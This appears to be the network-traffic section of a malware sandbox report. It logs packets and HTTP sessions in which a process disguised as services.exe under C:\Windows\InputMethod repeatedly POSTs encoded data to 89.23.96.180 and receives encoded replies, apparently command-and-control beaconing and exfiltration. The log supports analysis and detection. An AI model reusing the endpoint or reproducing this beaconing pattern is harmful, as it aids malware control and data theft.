                                                              Dec 21, 2024 10:48:29.377593994 CET4990580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:29.454899073 CET804990689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:29.502698898 CET4990680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:29.566260099 CET804990589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:29.612078905 CET4990580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:29.689913034 CET804990689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:29.736989975 CET4990680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:29.811290026 CET4990580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:29.811366081 CET4990680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:29.811630964 CET4991180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:29.931236029 CET804991189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:29.931452990 CET4991180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:29.931682110 CET4991180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:29.932503939 CET804990589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:29.932583094 CET4990580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:29.932631969 CET804990689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:29.932749987 CET4990680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:30.051279068 CET804991189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:30.284105062 CET4991180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:30.405210972 CET804991189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:30.405255079 CET804991189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:30.405284882 CET804991189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:31.308461905 CET804991189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:31.362210035 CET4991180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:31.542237043 CET804991189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:31.596684933 CET4991180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:31.658349991 CET4991180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:31.658608913 CET4991780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:31.778182030 CET804991789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:31.778290033 CET4991780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:31.778379917 CET804991189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:31.778456926 CET4991180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:31.778604031 CET4991780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:31.898184061 CET804991789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:32.127955914 CET4991780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:32.247714043 CET804991789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:32.247750998 CET804991789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:32.247786045 CET804991789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:33.167773008 CET804991789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:33.221393108 CET4991780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:33.280927896 CET4991780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:33.281162977 CET4992380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:33.403053999 CET804992389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:33.403202057 CET4992380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:33.403215885 CET804991789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:33.403285027 CET4991780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:33.403426886 CET4992380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:33.523231030 CET804992389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:33.752819061 CET4992380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:33.872643948 CET804992389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:33.872679949 CET804992389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:33.872709036 CET804992389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:34.581732035 CET4992380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:34.581772089 CET4992680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:34.701491117 CET804992689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:34.701574087 CET4992680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:34.701699972 CET4992680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:34.701819897 CET804992389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:34.701894999 CET4992380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:34.703136921 CET4992780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:34.821202993 CET804992689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:34.822752953 CET804992789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:34.822818995 CET4992780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:34.822994947 CET4992780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:34.942397118 CET804992789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:35.049635887 CET4992680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:35.169584990 CET804992689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:35.169651031 CET804992689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:35.174597025 CET4992780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:35.294426918 CET804992789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:35.294466019 CET804992789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:35.294495106 CET804992789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:36.078263998 CET804992689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:36.127571106 CET4992680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.199074984 CET804992789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:36.252646923 CET4992780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.314208984 CET804992689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:36.361949921 CET4992680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.438060045 CET804992789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:36.486942053 CET4992780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.560292006 CET4992680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.560307980 CET4992780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.560590029 CET4993280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.680613995 CET804992689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:36.680646896 CET804993289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:36.680742025 CET4992680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.680792093 CET4993280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.680911064 CET804992789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:36.680968046 CET4992780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.681042910 CET4993280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.800615072 CET804993289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:03.826407909 CET805001089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:03.954241991 CET5000980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:03.954474926 CET5001080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:03.954653025 CET5001680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:04.074513912 CET805001689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:04.074559927 CET805000989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:04.074623108 CET5001680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:04.074676037 CET5000980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:04.074774027 CET805001089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:04.074954987 CET5001680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:04.075010061 CET5001080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:04.194463968 CET805001689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:04.424951077 CET5001680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:04.544702053 CET805001689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:04.544755936 CET805001689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:04.544787884 CET805001689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:05.452729940 CET805001689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:05.565124035 CET5001680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:05.686933994 CET805001689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:05.752641916 CET5001680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:05.812746048 CET5002280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:05.932492971 CET805002289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:05.932600975 CET5002280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:05.932707071 CET5002280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:06.052340031 CET805002289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:06.284308910 CET5002280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:06.404094934 CET805002289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:06.404130936 CET805002289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:06.404160023 CET805002289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:07.313076973 CET805002289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:07.408974886 CET5002280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:07.546442032 CET805002289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:07.596409082 CET5002280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:07.693037987 CET5002280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:07.693944931 CET5002880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:07.815530062 CET805002289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:07.815638065 CET5002280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:07.816715956 CET805002889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:07.816920996 CET5002880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:07.817017078 CET5002880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:07.936728954 CET805002889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:08.174614906 CET5002880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:08.294380903 CET805002889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:08.294418097 CET805002889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:08.294454098 CET805002889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:08.426383018 CET5002980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:08.427432060 CET5002880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:08.546104908 CET805002989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:08.546205044 CET5002980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:08.546477079 CET5002980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:08.590140104 CET805002889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:08.607136965 CET5003080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:08.665997028 CET805002989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:08.726881027 CET805003089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:08.726979971 CET5003080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:08.727204084 CET5003080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:08.846673012 CET805003089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:08.857913971 CET805002889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:08.857975960 CET5002880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:08.893526077 CET5002980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:09.013115883 CET805002989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:09.013267040 CET805002989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:09.081408024 CET5003080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:09.201010942 CET805003089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:09.201072931 CET805003089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:09.201106071 CET805003089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:09.930911064 CET805002989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:10.002809048 CET5002980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:10.104902983 CET805003089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:10.166493893 CET805002989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:10.252789974 CET5003080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:10.338294029 CET805003089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:10.408961058 CET5002980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:10.565146923 CET5003080192.168.2.589.23.96.180
                                                              • 89.23.96.180
                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              0 | 192.168.2.5 | 49714 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:24.543824911 CET | 421 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 344
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:25.857626915 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:26.133721113 CET | 1236 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:25 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Dec 21, 2024 10:47:26.216372967 CET | 397 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 384
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:26.676223040 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:27.035319090 CET | 349 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:26 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Dec 21, 2024 10:47:27.209808111 CET | 398 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2100
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:27.668298960 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:28.033471107 CET | 349 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:27 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              1 | 192.168.2.5 | 49721 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:26.430229902 CET | 398 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:27.807076931 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:28.041794062 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:27 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              2 | 192.168.2.5 | 49724 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:28.329449892 CET | 398 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2532
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:29.704356909 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:29.937808990 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:29 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              3 | 192.168.2.5 | 49731 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:30.237173080 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:31.619678974 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:31.857820034 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:31 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              4 | 192.168.2.5 | 49737 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:32.346628904 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:32.705791950 CET2536OUTData Raw: 5d 56 46 53 5d 57 52 52 55 5e 55 5a 54 5d 50 55 57 52 5c 59 52 52 51 5e 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]VFS]WRRU^UZT]PUWR\YRRQ^_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY 91;%)=2*,, _3+.9Q <5Y&1(B+<[(Y>%!_.#Q,>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              5 | 192.168.2.5 | 49743 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:33.170469046 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2100
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:33.518145084 CET2100OUTData Raw: 58 51 46 53 58 5e 57 54 55 5e 55 5a 54 5b 50 56 57 53 5c 5f 52 51 51 59 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XQFSX^WTU^UZT[PVWS\_RQQY_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY 9!0W1=6=W5^-?<]';.+9Q7?>&!"+$#<.?)%!_.#Q,*
                                                              Dec 21, 2024 10:47:34.548418999 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:34.782004118 CET | 349 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:34 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 3a 0b 20 38 35 55 3f 03 37 12 29 3f 2d 0d 2a 3e 3e 5c 38 0b 37 5d 22 2c 07 06 29 03 27 5b 33 00 37 1e 22 5c 29 10 22 3f 2b 1d 2a 1b 2e 58 01 1e 22 1b 37 33 0c 0c 25 2f 34 0a 29 37 2a 5e 3c 2d 3a 10 26 3f 24 0f 25 3a 3c 15 3d 2a 24 51 32 3d 07 00 2c 06 2c 01 2b 2d 33 0d 33 26 2b 51 03 1e 26 5d 25 2f 27 55 24 33 26 03 26 00 25 1b 37 07 37 57 3e 3b 2c 0e 37 05 22 16 38 29 2c 59 28 03 07 04 2b 2b 21 01 33 02 20 0c 25 04 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 98: 85U?7)?-*>>\87]",)'[37"\)"?+*.X"73%/4)7*^<-:&?$%:<=*$Q2=,,+-33&+Q&]%/'U$3&&%77W>;,7"8),Y(++!3 %#T-,H1]V0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              6 | 192.168.2.5 | 49744 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:33.509001970 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:33.861929893 CET2536OUTData Raw: 5d 53 46 55 58 5e 52 53 55 5e 55 5a 54 5d 50 55 57 5a 5c 59 52 56 51 57 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]SFUX^RSU^UZT]PUWZ\YRVQW_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#91-9=2)_-Y8'Y/.+=4:'11*'?<+%!_.#Q,>
                                                              Dec 21, 2024 10:47:34.894548893 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:35.126171112 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:34 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              7 | 192.168.2.5 | 49752 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:47:36.838028908 CET | 398 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
